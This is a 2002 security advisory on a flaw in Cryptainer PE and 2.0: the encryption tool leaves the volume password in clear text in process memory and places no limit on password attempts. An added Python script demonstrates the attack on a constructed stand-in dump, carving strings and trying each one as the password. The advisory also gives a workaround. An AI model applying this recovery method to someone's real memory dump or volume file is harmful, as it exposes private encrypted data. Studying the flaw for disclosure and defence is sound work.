Cryptainer Password Disclosure Vulnerability

Vendor: SecureSoft
Versions Affected: Cryptainer PE and Cryptainer 2.0
Type: Password Disclosure
Severity: Medium
Date released: 16th December, 2002

Background
From vendor website: "Cryptainer PE's ease of use together with its powerful 448 bit strong encryption provides file security without changing the way you work. It creates a 100MB encrypted drive that can be loaded and unloaded as required. It combines ease of use and simple drag-and-drop operations with powerful 448 bit strong encryption ensuring total security with phenomenal ease of use and maximum convenience!" Both products use the Blowfish algorithm.

I. Description
Both versions of Cryptainer keep the password in clear text in the memory of the process, neither encrypting it nor zeroing it after use. The password remains visible as long as the following two conditions hold:

1. The user has entered the password at least once.
2. Cryptainer is still running.

Whether the encrypted volume is currently loaded makes no difference. Since the product offers an option to minimize to the System Tray, it is quite likely that a user would keep Cryptainer running with the encrypted volume unloaded, assuming that the files inside it are safe while the volume is not loaded. But an intruder who is able to dump the memory of the running process can ferret out the password with relative ease. Besides the password, the physical path of the volume file is also visible in clear text. Cryptainer also places no limit on the number of wrong password attempts. An intruder therefore only needs to collect the memory dump, copy the volume file (the logical volume is simply one large file at the path found in the dump) onto his own machine, and then run Cryptainer against that copy, trying each string from the dump in turn until the correct password is found.
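The following Python script is an added example, not code from Cryptainer, SecureSoft or this advisory. It carries out the procedure described above against a constructed, in-memory stand-in for a process dump: it carves printable ASCII and UTF-16LE strings the way `strings` does, picks out the drive-letter paths that would tell an intruder which volume file to copy, and then tries every carved string as the password, counting attempts, since the advisory notes there is no lockout. The dump contents, the `SECRET_PASSWORD` and `VOLUME_PATH` values, and the PBKDF2-based `make_volume_header`/`try_unlock` check are all assumptions standing in for Cryptainer's undocumented on-disk format; against the real product each candidate would instead be typed into Cryptainer running against the copied volume file.

```python
import hashlib
import random
import re
from typing import List, Optional, Tuple

# Constructed stand-ins. These are NOT Cryptainer's real secrets, strings or
# on-disk format; they exist only so the example runs offline.
SECRET_PASSWORD = "Mys3cretVolumeKey"
VOLUME_PATH = r"C:\Users\alice\Documents\private.cry"


def build_fake_dump(seed: int = 7) -> bytes:
    """Build a small, constructed 'process memory dump'.

    Real dumps are megabytes of mixed data. Here deterministic non-printable
    filler (NULs and high bytes) surrounds an ANSI copy of the password and a
    UTF-16LE copy of the volume path, mimicking what a Windows GUI process
    that never wipes its buffers leaves behind once the user has typed the
    password.
    """
    rnd = random.Random(seed)

    def filler(n: int) -> bytes:
        # Never yields a printable ASCII byte, so every carved string below
        # comes from the planted data, not from the filler.
        return bytes(rnd.choice((0x00, rnd.randrange(0x80, 0x100))) for _ in range(n))

    return (filler(64) + b"CryptainerPE\0" + filler(32)
            + VOLUME_PATH.encode("utf-16-le") + b"\0\0" + filler(96)
            + b"Enter password:\0" + SECRET_PASSWORD.encode("ascii") + b"\0"
            + filler(64) + b"kernel32.dll\0" + filler(48))


def carve_strings(dump: bytes, min_len: int = 6) -> List[str]:
    """Carve printable runs the way `strings` (ASCII) and `strings -el`
    (UTF-16LE) would, returned in dump order without duplicates."""
    hits: List[Tuple[int, str]] = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, dump):
        hits.append((m.start(), m.group().decode("ascii")))
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, dump):
        hits.append((m.start(), m.group().decode("utf-16-le")))
    seen, ordered = set(), []
    for _, s in sorted(hits):
        if s not in seen:
            seen.add(s)
            ordered.append(s)
    return ordered


def find_volume_paths(strings: List[str]) -> List[str]:
    """Drive-letter paths tell the intruder which file to copy off the machine."""
    return [s for s in strings if re.fullmatch(r"[A-Za-z]:\\.+", s)]


def make_volume_header(password: str, salt: bytes = b"\x01" * 16) -> bytes:
    """Stand-in for the volume's password check: salt || PBKDF2-SHA256(password).
    Assumption for this example only; the advisory says nothing about how
    Cryptainer actually verifies a password against the volume file."""
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 1000)


def try_unlock(header: bytes, candidate: str) -> bool:
    """One password attempt against the stand-in header (no lockout, as in Cryptainer)."""
    salt, tag = header[:16], header[16:]
    return hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, 1000) == tag


def recover_password(dump: bytes, header: bytes,
                     min_len: int = 6) -> Tuple[Optional[str], int]:
    """Try every carved string as the password, in dump order.

    Because there is no limit on wrong attempts, an intruder working on a copy
    of the volume file can afford to try them all.
    Returns (password or None, number of attempts made).
    """
    attempts = 0
    for candidate in carve_strings(dump, min_len):
        attempts += 1
        if try_unlock(header, candidate):
            return candidate, attempts
    return None, attempts


if __name__ == "__main__":
    dump = build_fake_dump()
    header = make_volume_header(SECRET_PASSWORD)
    print("volume file(s) named in the dump:", find_volume_paths(carve_strings(dump)))
    print("recovered password, attempts:", recover_password(dump, header))
```

On a real dump the candidate list runs to thousands of strings rather than five, but the cost is the same loop; prompts such as "Enter password:" sitting next to the password in memory are a useful hint about where to look first.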

II. Impact
First of all, the intruder needs physical access to the PC in order to take a memory dump of the process. Moreover, Cryptainer must be running, with the encrypted volume either loaded or unloaded; this is not uncommon. On the other hand, a physical intrusion is precisely the event in which one relies on encryption software to protect one's data, so the physical access event must be assumed to have occurred. The probability of a compromise is then the probability that Cryptainer is running in the System Tray and that the user has entered the password at least once in that session.

III. Vendor Response
The vendor's response is not clear. A fix might come in the next release, due in the first quarter of 2003. An intruder with the same level of access could also install a keylogger to capture the password.

IV. Workaround
Do not keep Cryptainer minimized in the System Tray, even after you have unloaded the encrypted volume. Exit the software as soon as you have finished encrypting or decrypting files, by clicking the Shutdown and Exit button.

References
A similar vulnerability was found in Password Safe, written by cryptographer Bruce Schneier: http://www.counterpane.com/crypto-gram-0111.html#6

Network Intelligence (I) Pvt. Ltd. © 2004